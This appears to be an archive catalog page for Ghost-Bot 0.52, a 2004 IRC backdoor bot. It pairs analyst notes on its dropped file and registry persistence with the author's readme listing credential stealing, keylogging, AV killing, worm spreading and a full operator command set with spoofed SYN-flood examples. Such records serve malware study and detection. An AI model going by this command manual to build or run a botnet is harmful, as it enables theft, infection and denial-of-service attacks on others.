.: Ghost-Bot 0.52 :.
Released 18 years, 5 months ago. Mar 2004
By Positron::actions
Additional Details
- Coded by: Positron
- Version: Ghost-Bot 0.52
- Released date: Mar 2004, 18 years, 5 months ago.
- Family: Ghost-Bot
- Category: Remote Access
MegaSecurity Notes
GhostBot: dropped file: c:\WINDOWS\84Gkbi7V.exe size: 34.616 bytes startup: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "AVPTC32" data: C:\WINDOWS\84Gkbi7V.exe does (try to) connect to an IRC server tested on Windows XP 13 November 2004
Author Words
;-----------------------------------------------------------------------------------; ; BOT Name: Ghost-BOT 0.52 ; ; --------------------------------------------------------------------------------- ; ; Features: ; ; - SpyBot compatible commands, ; ; - AV/FW killer, ; ; - CD-Key Stealer, ; ; - Mydoom spreader, ; ; - NetBIOS spreader, ; ; - Encrypted strings in EXE, ; ; - Web-server (--/URL REDACTED BY SUB7CREW.ORG FOR YOUR SAFETY\--), ; ; - API search engine by CRC32 (used only for important APIs), ; ; - KeyLogger (Keylog file can be download from webserver too), ; ; - P2P spreader (Kazaa, Edonkey, Morpheus, XoloX, ShareAza, LimeWire, ; ; - Prepend all .exe files in shared dirs if they are smaller than 5MB, ; ; - Support DCC SEND, DCC GET, DCC CHAT and topic commands. ; ; COMMANDS LIST: (Note: Only the "login" command is case sensitive) -------------- login password (example: login hello) delete [filename] (example: delete c:\windows\temp.exe) execute [filename] (example: delete c:\windows\temp.exe) rename [origenamfile] [newfile] (example: rename c:\windows\temp.exe c:\windows\driver.exe) makedir [dirname] (example: makedir c:\test\) info (info: gives some info) killprocess [processname] (example: killprocess mcafee.exe) disconnect [sec.] (info: disconnect the bot for x sec. if sec. is not given it disconnect the bot for 30mins.) quit (info: bot quits running) download [url] [filename] (example: download --/URL REDACTED BY SUB7CREW.ORG FOR YOUR SAFETY\-- c:\driver.exe) httpserver [Port] [root-dir] (example: httpserver 81 c:\) listprocesses (info: lists all running proccesses) op get [filename] (example: get c:\command.com will trigger a dcc send on the remote pc) raw [raw command] (example: raw PRIVMSG #ghostbot :hello) list [path+filter] (example: list c:\*.*) cdkeys (info: search CD-Keys on server's computer) restart (info: restarts the server's computer) shutdown (info: shuts down the server's computer) ipscan [StartIP] [port] (example: ipscan 1.1.1.1 3137) stopipscan (info: stop IP scanner) uninstall (info: remove BOT) startmydoom (info: restart MyDoom spreader) stopmydoom (info: stop MyDoom spreader) startavfwkiller {info: restart AV/FW killer} stopavfwkiller {info: stop AV/FW killer} starnetbios {info: (re)start netbios spreader} stopnetbios {info: stop netbios spreader} clone [srv.] [port] [chan] [number of clones] (example: clone 1.1.1.1 6667 #abc 4) rawclones [command] (example: rawclones PRIVMSG #ABCD :hello ; info: some servers do not allow more than 1 clone) killclones (info: remove all clones) stopsyn (info: stop syn flooder) update [URL] (example: update --/URL REDACTED BY SUB7CREW.ORG FOR YOUR SAFETY\--) Syn Flooder command ------------------- syn [victim] [options] Options: -S: Spoof host (0 is random (default)) -p: Separated list of dest ports (0 is random (default)) -s: Separated list of src ports (0 is random (default)) -n: Number of packets (0 is continuous (default)) -d: Delay (in ms) (default 0) Example I: syn --/URL REDACTED BY SUB7CREW.ORG FOR YOUR SAFETY\-- -p 21,23,80,110 On this attack: - Victim: --/URL REDACTED BY SUB7CREW.ORG FOR YOUR SAFETY\-- - Source IP: Random - Destination ports: 21 + 23 + 80 + 110 - Source ports: Random - Count: Continuous - Delay: 0 ms (no delay between packets) Example II: syn --/URL REDACTED BY SUB7CREW.ORG FOR YOUR SAFETY\-- -S --/URL REDACTED BY SUB7CREW.ORG FOR YOUR SAFETY\-- -p 21,80 -s 42,63 -n 1 -d 50 On this attack: - Victim: --/URL REDACTED BY SUB7CREW.ORG FOR YOUR SAFETY\-- - Source IP/host: --/URL REDACTED BY SUB7CREW.ORG FOR YOUR SAFETY\-- - Destination ports: 21 + 80 - Source ports: 42 + 63 - Count: 1 * Please note that 1 count will send the syn packets from every * * source port to every destination port. This means 4 packets * * will be transmited with a 1 count on this attack. * - Delay: 50 ms Positron
URL's and mails were automatically redacted (filtered) for reader's safety. However the filter is not perfect and can't find all harmful elements. If you find something dangerous including file link, website, mail address, profanity... contact me immediately at sub7crew@protonmail.com, thank you in advance.